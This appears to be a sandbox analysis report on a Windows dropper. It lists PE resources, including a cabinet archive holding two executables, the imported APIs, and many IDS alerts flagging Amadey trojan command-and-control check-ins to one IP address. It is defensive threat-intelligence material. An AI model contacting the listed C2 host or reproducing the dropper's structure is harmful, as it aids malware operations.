                                                        RT_ICON | 0x10484 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States
                                                        RT_ICON | 0x105ac | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States
                                                        RT_ICON | 0x11454 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States
                                                        RT_ICON | 0x11cfc | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States
                                                        RT_ICON | 0x123c4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States
                                                        RT_ICON | 0x1292c | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
                                                        RT_ICON | 0x20300 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States
                                                        RT_ICON | 0x228a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States
                                                        RT_ICON | 0x23950 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States
                                                        RT_ICON | 0x242d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States
                                                        RT_DIALOG | 0x24740 | 0x2f2 | data | English | United States
                                                        RT_DIALOG | 0x24a34 | 0x35c | data | Russian | Russia
                                                        RT_DIALOG | 0x24d90 | 0x1b0 | data | English | United States
                                                        RT_DIALOG | 0x24f40 | 0x1b4 | data | Russian | Russia
                                                        RT_DIALOG | 0x250f4 | 0x166 | data | English | United States
                                                        RT_DIALOG | 0x2525c | 0x168 | data | Russian | Russia
                                                        RT_DIALOG | 0x253c4 | 0x1c0 | data | English | United States
                                                        RT_DIALOG | 0x25584 | 0x1e0 | data | Russian | Russia
                                                        RT_DIALOG | 0x25764 | 0x130 | data | English | United States
                                                        RT_DIALOG | 0x25894 | 0x150 | data | Russian | Russia
                                                        RT_DIALOG | 0x259e4 | 0x120 | data | English | United States
                                                        RT_DIALOG | 0x25b04 | 0x122 | data | Russian | Russia
                                                        RT_STRING | 0x25c28 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States
                                                        RT_STRING | 0x25cb4 | 0x86 | Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0 | Russian | Russia
                                                        RT_STRING | 0x25d3c | 0x520 | data | English | United States
                                                        RT_STRING | 0x2625c | 0x52e | data | Russian | Russia
                                                        RT_STRING | 0x2678c | 0x5cc | data | English | United States
                                                        RT_STRING | 0x26d58 | 0x592 | data | Russian | Russia
                                                        RT_STRING | 0x272ec | 0x4b0 | data | English | United States
                                                        RT_STRING | 0x2779c | 0x4b2 | data | Russian | Russia
                                                        RT_STRING | 0x27c50 | 0x44a | data | English | United States
                                                        RT_STRING | 0x2809c | 0x43e | data | Russian | Russia
                                                        RT_STRING | 0x284dc | 0x3ce | data | English | United States
                                                        RT_STRING | 0x288ac | 0x2fc | data | Russian | Russia
                                                        RT_RCDATA | 0x28ba8 | 0x7 | ASCII text, with no line terminators | English | United States
                                                        RT_RCDATA | 0x28bb0 | 0x6bd84 | Microsoft Cabinet archive data, many, 441732 bytes, 2 files, at 0x2c +A "bjAg.exe" +A "xriv.exe", ID 1565, number 1, 20 datablocks, 0x1503 compression | English | United States
                                                        RT_RCDATA | 0x94934 | 0x4 | data | English | United States
                                                        RT_RCDATA | 0x94938 | 0x24 | data | English | United States
                                                        RT_RCDATA | 0x9495c | 0x7 | ASCII text, with no line terminators | English | United States
                                                        RT_RCDATA | 0x94964 | 0x7 | ASCII text, with no line terminators | English | United States
                                                        RT_RCDATA | 0x9496c | 0x4 | data | English | United States
                                                        RT_RCDATA | 0x94970 | 0x9 | ASCII text, with no line terminators | English | United States
                                                        RT_RCDATA | 0x9497c | 0x4 | data | English | United States
                                                        RT_RCDATA | 0x94980 | 0x9 | ASCII text, with no line terminators | English | United States
                                                        RT_RCDATA | 0x9498c | 0x4 | data | English | United States
                                                        RT_RCDATA | 0x94990 | 0x6 | data | English | United States
                                                        RT_RCDATA | 0x94998 | 0x7 | ASCII text, with no line terminators | English | United States
                                                        RT_RCDATA | 0x949a0 | 0x7 | ASCII text, with no line terminators | English | United States
                                                        RT_GROUP_ICON | 0x949a8 | 0xbc | data | English | United States
                                                        RT_VERSION | 0x94a64 | 0x408 | data | English | United States
                                                        RT_VERSION | 0x94e6c | 0x410 | data | Russian | Russia
                                                        RT_MANIFEST | 0x9527c | 0x7e2 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States
                                                        DLL | Import
                                                        ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                        KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
                                                        GDI32.dll | GetDeviceCaps
                                                        USER32.dll | SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
                                                        msvcrt.dll | _controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
                                                        COMCTL32.dll |
                                                        Cabinet.dll |
                                                        VERSION.dll | GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
Language of compilation system | Country where language is spoken | Map
English | United States |
Russian | Russia |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                        192.168.2.562.204.41.449805802027700 02/06/23-14:17:18.884453TCP2027700ET TROJAN Amadey CnC Check-In4980580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449781802027700 02/06/23-14:17:06.429230TCP2027700ET TROJAN Amadey CnC Check-In4978180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449710802027700 02/06/23-14:16:33.533909TCP2027700ET TROJAN Amadey CnC Check-In4971080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450115802027700 02/06/23-14:18:43.044125TCP2027700ET TROJAN Amadey CnC Check-In5011580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450133802027700 02/06/23-14:18:47.416110TCP2027700ET TROJAN Amadey CnC Check-In5013380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450174802027700 02/06/23-14:18:58.884943TCP2027700ET TROJAN Amadey CnC Check-In5017480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449828802027700 02/06/23-14:17:24.646925TCP2027700ET TROJAN Amadey CnC Check-In4982880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450027802027700 02/06/23-14:18:19.567097TCP2027700ET TROJAN Amadey CnC Check-In5002780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449751802027700 02/06/23-14:16:59.053794TCP2027700ET TROJAN Amadey CnC Check-In4975180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449846802027700 02/06/23-14:17:29.052087TCP2027700ET TROJAN Amadey CnC Check-In4984680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450205802027700 02/06/23-14:19:06.323850TCP2027700ET TROJAN Amadey CnC Check-In5020580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449705802027700 02/06/23-14:16:32.323528TCP2027700ET TROJAN Amadey CnC Check-In4970580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449962802027700 02/06/23-14:18:02.000570TCP2027700ET TROJAN Amadey CnC Check-In4996280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449990802027700 02/06/23-14:18:08.739973TCP2027700ET TROJAN Amadey CnC Check-In4999080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450113802027700 02/06/23-14:18:42.545396TCP2027700ET TROJAN Amadey CnC Check-In5011380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449702802027700 02/06/23-14:16:31.544827TCP2027700ET TROJAN Amadey CnC Check-In4970280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449730802027700 02/06/23-14:16:44.596890TCP2027700ET TROJAN Amadey CnC Check-In4973080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449876802027700 02/06/23-14:17:38.908848TCP2027700ET TROJAN Amadey CnC Check-In4987680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450143802027700 02/06/23-14:18:51.490212TCP2027700ET TROJAN Amadey CnC Check-In5014380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449818802027700 02/06/23-14:17:22.140346TCP2027700ET TROJAN Amadey CnC Check-In4981880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450146802027700 02/06/23-14:18:52.228128TCP2027700ET TROJAN Amadey CnC Check-In5014680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449693802027700 02/06/23-14:16:29.330240TCP2027700ET TROJAN Amadey CnC Check-In4969380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449698802027700 02/06/23-14:16:30.576133TCP2027700ET TROJAN Amadey CnC Check-In4969880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449989802027700 02/06/23-14:18:08.504518TCP2027700ET TROJAN Amadey CnC Check-In4998980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449871802027700 02/06/23-14:17:37.725069TCP2027700ET TROJAN Amadey CnC Check-In4987180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449897802027700 02/06/23-14:17:44.164540TCP2027700ET TROJAN Amadey CnC Check-In4989780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449815802027700 02/06/23-14:17:21.391573TCP2027700ET TROJAN Amadey CnC Check-In4981580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450100802027700 02/06/23-14:18:39.335819TCP2027700ET TROJAN Amadey CnC Check-In5010080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449807802027700 02/06/23-14:17:19.395600TCP2027700ET TROJAN Amadey CnC Check-In4980780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450098802027700 02/06/23-14:18:38.869062TCP2027700ET TROJAN Amadey CnC Check-In5009880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449848802027700 02/06/23-14:17:29.531648TCP2027700ET TROJAN Amadey CnC Check-In4984880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450141802027700 02/06/23-14:18:50.069928TCP2027700ET TROJAN Amadey CnC Check-In5014180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449784802027700 02/06/23-14:17:07.177698TCP2027700ET TROJAN Amadey CnC Check-In4978480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450182802027700 02/06/23-14:19:00.788880TCP2027700ET TROJAN Amadey CnC Check-In5018280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450218802027700 02/06/23-14:19:11.381609TCP2027700ET TROJAN Amadey CnC Check-In5021880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450259802027700 02/06/23-14:19:21.359170TCP2027700ET TROJAN Amadey CnC Check-In5025980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450000802027700 02/06/23-14:18:11.377143TCP2027700ET TROJAN Amadey CnC Check-In5000080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449889802027700 02/06/23-14:17:42.087363TCP2027700ET TROJAN Amadey CnC Check-In4988980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449713802027700 02/06/23-14:16:34.634243TCP2027700ET TROJAN Amadey CnC Check-In4971380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450041802027700 02/06/23-14:18:22.955497TCP2027700ET TROJAN Amadey CnC Check-In5004180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450118802027700 02/06/23-14:18:43.766872TCP2027700ET TROJAN Amadey CnC Check-In5011880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450171802027700 02/06/23-14:18:58.166616TCP2027700ET TROJAN Amadey CnC Check-In5017180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449843802027700 02/06/23-14:17:28.350642TCP2027700ET TROJAN Amadey CnC Check-In4984380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449884802027700 02/06/23-14:17:40.878750TCP2027700ET TROJAN Amadey CnC Check-In4988480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450248802027700 02/06/23-14:19:18.703803TCP2027700ET TROJAN Amadey CnC Check-In5024880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449881802027700 02/06/23-14:17:40.148507TCP2027700ET TROJAN Amadey CnC Check-In4988180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450154802027700 02/06/23-14:18:54.119780TCP2027700ET TROJAN Amadey CnC Check-In5015480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450243802027700 02/06/23-14:19:17.486100TCP2027700ET TROJAN Amadey CnC Check-In5024380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449970802027700 02/06/23-14:18:03.894708TCP2027700ET TROJAN Amadey CnC Check-In4997080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449774802027700 02/06/23-14:17:04.719767TCP2027700ET TROJAN Amadey CnC Check-In4977480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450047802027700 02/06/23-14:18:24.370968TCP2027700ET TROJAN Amadey CnC Check-In5004780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449835802027700 02/06/23-14:17:26.426113TCP2027700ET TROJAN Amadey CnC Check-In4983580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449924802027700 02/06/23-14:17:50.645406TCP2027700ET TROJAN Amadey CnC Check-In4992480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450065802027700 02/06/23-14:18:28.913263TCP2027700ET TROJAN Amadey CnC Check-In5006580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450019802027700 02/06/23-14:18:17.663562TCP2027700ET TROJAN Amadey CnC Check-In5001980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450215802027700 02/06/23-14:19:10.669293TCP2027700ET TROJAN Amadey CnC Check-In5021580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449746802027700 02/06/23-14:16:57.847861TCP2027700ET TROJAN Amadey CnC Check-In4974680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449942802027700 02/06/23-14:17:57.083818TCP2027700ET TROJAN Amadey CnC Check-In4994280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450108802027700 02/06/23-14:18:41.274401TCP2027700ET TROJAN Amadey CnC Check-In5010880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450187802027700 02/06/23-14:19:01.971976TCP2027700ET TROJAN Amadey CnC Check-In5018780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449853802027700 02/06/23-14:17:30.867273TCP2027700ET TROJAN Amadey CnC Check-In4985380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449764802027700 02/06/23-14:17:02.319285TCP2027700ET TROJAN Amadey CnC Check-In4976480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450031802027700 02/06/23-14:18:20.511059TCP2027700ET TROJAN Amadey CnC Check-In5003180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450120802027700 02/06/23-14:18:44.246465TCP2027700ET TROJAN Amadey CnC Check-In5012080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450126802027700 02/06/23-14:18:45.717300TCP2027700ET TROJAN Amadey CnC Check-In5012680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449952802027700 02/06/23-14:17:59.609624TCP2027700ET TROJAN Amadey CnC Check-In4995280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450037802027700 02/06/23-14:18:21.991529TCP2027700ET TROJAN Amadey CnC Check-In5003780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449958802027700 02/06/23-14:18:01.022168TCP2027700ET TROJAN Amadey CnC Check-In4995880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450003802027700 02/06/23-14:18:13.453554TCP2027700ET TROJAN Amadey CnC Check-In5000380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449863802027700 02/06/23-14:17:35.672249TCP2027700ET TROJAN Amadey CnC Check-In4986380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450192802027700 02/06/23-14:19:03.186396TCP2027700ET TROJAN Amadey CnC Check-In5019280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449792802027700 02/06/23-14:17:12.357233TCP2027700ET TROJAN Amadey CnC Check-In4979280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449869802027700 02/06/23-14:17:37.244652TCP2027700ET TROJAN Amadey CnC Check-In4986980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449999802027700 02/06/23-14:18:11.060496TCP2027700ET TROJAN Amadey CnC Check-In4999980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450088802027700 02/06/23-14:18:36.403853TCP2027700ET TROJAN Amadey CnC Check-In5008880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450110802027700 02/06/23-14:18:41.820358TCP2027700ET TROJAN Amadey CnC Check-In5011080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450021802027700 02/06/23-14:18:18.134393TCP2027700ET TROJAN Amadey CnC Check-In5002180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450177802027700 02/06/23-14:18:59.607121TCP2027700ET TROJAN Amadey CnC Check-In5017780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450269802027700 02/06/23-14:19:23.777741TCP2027700ET TROJAN Amadey CnC Check-In5026980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449993802027700 02/06/23-14:18:09.446812TCP2027700ET TROJAN Amadey CnC Check-In4999380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450009802027700 02/06/23-14:18:15.225597TCP2027700ET TROJAN Amadey CnC Check-In5000980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449812802027700 02/06/23-14:17:20.620292TCP2027700ET TROJAN Amadey CnC Check-In4981280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449879802027700 02/06/23-14:17:39.657688TCP2027700ET TROJAN Amadey CnC Check-In4987980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449720802027700 02/06/23-14:16:38.844826TCP2027700ET TROJAN Amadey CnC Check-In4972080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449723802027700 02/06/23-14:16:39.562180TCP2027700ET TROJAN Amadey CnC Check-In4972380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449968802027700 02/06/23-14:18:03.426821TCP2027700ET TROJAN Amadey CnC Check-In4996880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449901802027700 02/06/23-14:17:45.128471TCP2027700ET TROJAN Amadey CnC Check-In4990180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450238802027700 02/06/23-14:19:16.271312TCP2027700ET TROJAN Amadey CnC Check-In5023880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450149802027700 02/06/23-14:18:52.948054TCP2027700ET TROJAN Amadey CnC Check-In5014980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449708802027700 02/06/23-14:16:33.047919TCP2027700ET TROJAN Amadey CnC Check-In4970880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450250802027700 02/06/23-14:19:19.184250TCP2027700ET TROJAN Amadey CnC Check-In5025080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450253802027700 02/06/23-14:19:19.903146TCP2027700ET TROJAN Amadey CnC Check-In5025380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450161802027700 02/06/23-14:18:55.790925TCP2027700ET TROJAN Amadey CnC Check-In5016180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449891802027700 02/06/23-14:17:42.583953TCP2027700ET TROJAN Amadey CnC Check-In4989180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450034802027700 02/06/23-14:18:21.257214TCP2027700ET TROJAN Amadey CnC Check-In5003480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450075802027700 02/06/23-14:18:33.288721TCP2027700ET TROJAN Amadey CnC Check-In5007580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450164802027700 02/06/23-14:18:56.510220TCP2027700ET TROJAN Amadey CnC Check-In5016480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449914802027700 02/06/23-14:17:48.241764TCP2027700ET TROJAN Amadey CnC Check-In4991480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449980802027700 02/06/23-14:18:06.304828TCP2027700ET TROJAN Amadey CnC Check-In4998080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449761802027700 02/06/23-14:17:01.580132TCP2027700ET TROJAN Amadey CnC Check-In4976180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449850802027700 02/06/23-14:17:30.084700TCP2027700ET TROJAN Amadey CnC Check-In4985080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450225802027700 02/06/23-14:19:13.073061TCP2027700ET TROJAN Amadey CnC Check-In5022580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449736802027700 02/06/23-14:16:52.079670TCP2027700ET TROJAN Amadey CnC Check-In4973680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449866802027700 02/06/23-14:17:36.501145TCP2027700ET TROJAN Amadey CnC Check-In4986680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449825802027700 02/06/23-14:17:23.920192TCP2027700ET TROJAN Amadey CnC Check-In4982580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449996802027700 02/06/23-14:18:10.162120TCP2027700ET TROJAN Amadey CnC Check-In4999680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450006802027700 02/06/23-14:18:14.489864TCP2027700ET TROJAN Amadey CnC Check-In5000680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449955802027700 02/06/23-14:18:00.317509TCP2027700ET TROJAN Amadey CnC Check-In4995580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450136802027700 02/06/23-14:18:48.120124TCP2027700ET TROJAN Amadey CnC Check-In5013680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449777802027700 02/06/23-14:17:05.460296TCP2027700ET TROJAN Amadey CnC Check-In4977780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450266802027700 02/06/23-14:19:23.059192TCP2027700ET TROJAN Amadey CnC Check-In5026680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450059802027700 02/06/23-14:18:27.376298TCP2027700ET TROJAN Amadey CnC Check-In5005980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450157802027700 02/06/23-14:18:54.822506TCP2027700ET TROJAN Amadey CnC Check-In5015780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450062802027700 02/06/23-14:18:28.208950TCP2027700ET TROJAN Amadey CnC Check-In5006280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449829802027700 02/06/23-14:17:24.880677TCP2027700ET TROJAN Amadey CnC Check-In4982980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449927802027700 02/06/23-14:17:51.554248TCP2027700ET TROJAN Amadey CnC Check-In4992780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449832802027700 02/06/23-14:17:25.693521TCP2027700ET TROJAN Amadey CnC Check-In4983280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450160802027700 02/06/23-14:18:55.547495TCP2027700ET TROJAN Amadey CnC Check-In5016080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449734802027700 02/06/23-14:16:51.611739TCP2027700ET TROJAN Amadey CnC Check-In4973480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450001802027700 02/06/23-14:18:11.711181TCP2027700ET TROJAN Amadey CnC Check-In5000180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450255802027700 02/06/23-14:19:20.388213TCP2027700ET TROJAN Amadey CnC Check-In5025580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449930802027700 02/06/23-14:17:53.103784TCP2027700ET TROJAN Amadey CnC Check-In4993080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449988802027700 02/06/23-14:18:08.271366TCP2027700ET TROJAN Amadey CnC Check-In4998880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449762802027700 02/06/23-14:17:01.814767TCP2027700ET TROJAN Amadey CnC Check-In4976280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450090802027700 02/06/23-14:18:36.931058TCP2027700ET TROJAN Amadey CnC Check-In5009080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449860802027700 02/06/23-14:17:33.773507TCP2027700ET TROJAN Amadey CnC Check-In4986080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449767802027700 02/06/23-14:17:03.053144TCP2027700ET TROJAN Amadey CnC Check-In4976780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450095802027700 02/06/23-14:18:38.133971TCP2027700ET TROJAN Amadey CnC Check-In5009580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450193802027700 02/06/23-14:19:03.417591TCP2027700ET TROJAN Amadey CnC Check-In5019380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449963802027700 02/06/23-14:18:02.243572TCP2027700ET TROJAN Amadey CnC Check-In4996380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449804802027700 02/06/23-14:17:18.644415TCP2027700ET TROJAN Amadey CnC Check-In4980480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450132802027700 02/06/23-14:18:47.164865TCP2027700ET TROJAN Amadey CnC Check-In5013280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449770802027700 02/06/23-14:17:03.784821TCP2027700ET TROJAN Amadey CnC Check-In4977080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449983802027700 02/06/23-14:18:07.033596TCP2027700ET TROJAN Amadey CnC Check-In4998380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449692802027700 02/06/23-14:16:29.077816TCP2027700ET TROJAN Amadey CnC Check-In4969280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450227802027700 02/06/23-14:19:13.545015TCP2027700ET TROJAN Amadey CnC Check-In5022780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450222802027700 02/06/23-14:19:12.337102TCP2027700ET TROJAN Amadey CnC Check-In5022280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449739802027700 02/06/23-14:16:52.782774TCP2027700ET TROJAN Amadey CnC Check-In4973980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450185802027700 02/06/23-14:19:01.492596TCP2027700ET TROJAN Amadey CnC Check-In5018580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449898802027700 02/06/23-14:17:44.411727TCP2027700ET TROJAN Amadey CnC Check-In4989880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450104802027700 02/06/23-14:18:40.328930TCP2027700ET TROJAN Amadey CnC Check-In5010480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449857802027700 02/06/23-14:17:31.816085TCP2027700ET TROJAN Amadey CnC Check-In4985780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449893802027700 02/06/23-14:17:43.066540TCP2027700ET TROJAN Amadey CnC Check-In4989380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449935802027700 02/06/23-14:17:55.397933TCP2027700ET TROJAN Amadey CnC Check-In4993580192.168.2.562.204.41.4
